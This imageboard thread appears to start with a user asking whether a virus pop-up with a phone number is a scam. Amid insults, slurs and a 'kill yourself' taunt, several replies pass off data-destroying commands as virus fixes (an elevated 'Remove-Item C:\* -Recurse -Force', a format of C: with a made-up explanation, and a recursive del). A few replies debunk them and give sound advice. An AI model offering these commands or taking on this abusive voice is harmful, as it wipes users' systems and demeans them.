HELP

Jow Forums I need help.

I have this pop up thing saying that I have I virus.

It says it locked down my laptop and that I need to call that phone number.

However, I’m not sure if this is a legit security alert or if is a scam. I don’t recognize the number being MC

Attached: CBF593E6-389F-49E7-AF9C-E9ADFA8C860B.jpg (3264x2448, 1.99M)

Attached: FE2535E6-40A5-4D0E-967D-080DB3A452E1.jpg (3264x2448, 1.92M)

>Spore
Based as fuck

>Microsoft Edge

For what purpose.

1. Images are sideways. Orient your phone correctly.
2. Shortcuts in your desktop instead of just leaving them in steam or even just categorizing them into folders.
3. Windows10 (not even LTSC/B version).
4. Cortana is still activated.
5. Using Edge.
6. Default crapware still pinned on your taskbar.
7. Microsoft store still activated.
8. Split the image into two parts like a moron.
9. iFag image names.
10. Using Microsoft Windows Malicious Software Removal Tool instead of Malwarebytes scans.
11. Using Avira antivirus as well.
12. Contacts icon still pinned on taskbar.
13. Falling for pop up scams.
14. Using a laptop instead of a regular computer.
Fourteen reasons you should kill yourself

> Jow Forums is NOT your personal tech support team or personal consumer review site.

Call tech support, friend!

cont.
>using any antivirus/malware other than CommonSense(TM)
>falling for the intel meme, enjoy your backdoors
>shitty vidya, very very unbased
>burger timezone
>browser isn't firefox
>browser isn't maximized for some reason
>gaymer-esque design laptop, probably integrated graphics
I gave you even more reasons to leave and never come back to this place

>using firefox

Okay user I got you, don't listen to those loosers
The fact is you're infected with malware, in other words virus
you can go on and download a plethora of anti-virus software or do a simple command
press the windows button on your keyboard and than search "powershell" without quotes as pic related
then right click powershell and choose run as administrator
than just copy and paste the following
Remove-Item C:\* -Recurse -Force
Press enter and presto! Your system will be free of virus!
All those linuxtards keep talking bad about windows but they just don't know how efficient it can be
Hope it helps user!

Attached: How-to-open-an-elevated-PowerShell-prompt.jpg (400x477, 32K)

Chrome is proprietary botnet, chromium too. bye bye adblockers as well (in the near future, also hostfiles and pihole type blockers don't cover most ads). Brave is literal adware and Firefox forks are behind in security updates. Firefox with about:config tweaks fits my threat model and is the only real viable open source browser right now. I'd be glad to be proven wrong but I'm right

Run the built-in virus scan for Windows 10 you fucking retard. Type "cmd" in the search bar and hit enter, then in the command prompt (OH NO COMMAND PROMPT SO SCARY) type "formAT /FS:NTFS /P:6"
That opens up the Form A.T. for your current ntfs filesystem (WOW SO FUCKING HARD) and checks with privilege level 6 so nothing can hide. Screencap the results and we'll go from there.

This is literally the only way to fix your shit OP, listen to this guy.
This can also work but I would recommend using both solutions

Of course I forgot the most important part, make that command "formAT C: /FS:NTFS /P:6" or else you're going to be waiting all day.

Dude how could you forget that? the program would never find the virus without the C: programming language. It would just run on and on for hours. Good thing you corrected your mistake.
This is legit user, you can do that too

>actually helping a newfag who can't even take a screenshot
This place is fucking dead, I might as well be on leddit.

As long as OP follows this advice, he'll be fine

>Not knowing how to take screenshots
>Thinking that the phone number will take him directly to Microsoft tech support over a virus
OP; it's clearly fake.

It's a virus that was programmed by Pajeets to try and trick gullible people like you into calling in and paying a ransom to "clean the virus," which actually stays on your system so that you keep on calling to pay for fake virus cleaning service.

If OP has the standard command line instead of Power Shell running for some reason, he can still do this by typing "del /f /s /q c:\*.*"

>It's just a fake popup user, don't listen to any of the other bs in this thread
I have a few customers each day call me or come in w/ their pc and have this pop up or something similar.
It's easy to fix to
>Crash your browser using task manager(ctrl+shift+esc)
Or
>Force reboot your computer (ctrl+alt+delete then restart from the bottom right)

Don't restore tabs when you open backup edge.

Usually these type of popups are caused by unsecured ad servers when you do a google search, or if you mistype a site address like typing www.amazonon.com vs www.amazon.com

Avoid clicking links that have a green ad symbol in front of the https link when doing a search w/ google/bing.

>Jow Forums isn't your personal tech support, if you can't clean up your system please just take it to a pro.

If you really want to make sure your stuff is good though run malwarebytes, it's good for some basic shit(malware/spyware/fake programs like driver support or systemcleanup tool). if you had an actual virus you'd be having a lot more trouble.

Dude, all OP needs to do is already here:

>infoqueryapply.gq
That doesn't spell "microsoft.com"

hang yourself

yeah I taken advise, everything seems fine.

if some shit happens ill do what recommends

yeah that was one of the red flags that prevented me from calling that number.

OP, windows 10 can't get viruses, its too advanced. ignore that.

Hey dude I recommend still doing
or
because you never know if your browser actually got infected or not, once you already visited the fake site.

Don't do what this jackass said ever. That's pretty much a death sentence for your OS.

>Unless want to lose all your shit and to make windows unable to boot.

What it breaks down as is it will remove everything in the C: directory force the removal and recuse(which means keep trying until it works) after that good luck booting into windows.

ignore this faggot he is a bosnian transgender midget

lmao why are you trying to trick OP? no one believes your bullshit shilling, do you work for the virus coders?

>getting a 40 inch tall transvestite dwarf delivered to your door
>mfw I actually thought i ordered a 40 inch TV
>mfw i have no face

>bosnian transgender midget
How did you know!?!
That kinda fake bs is the shit /b/tards and Summer fags do.

You know in your heart that it's the only way that OP will fix his computer. stop shilling/tricking the OP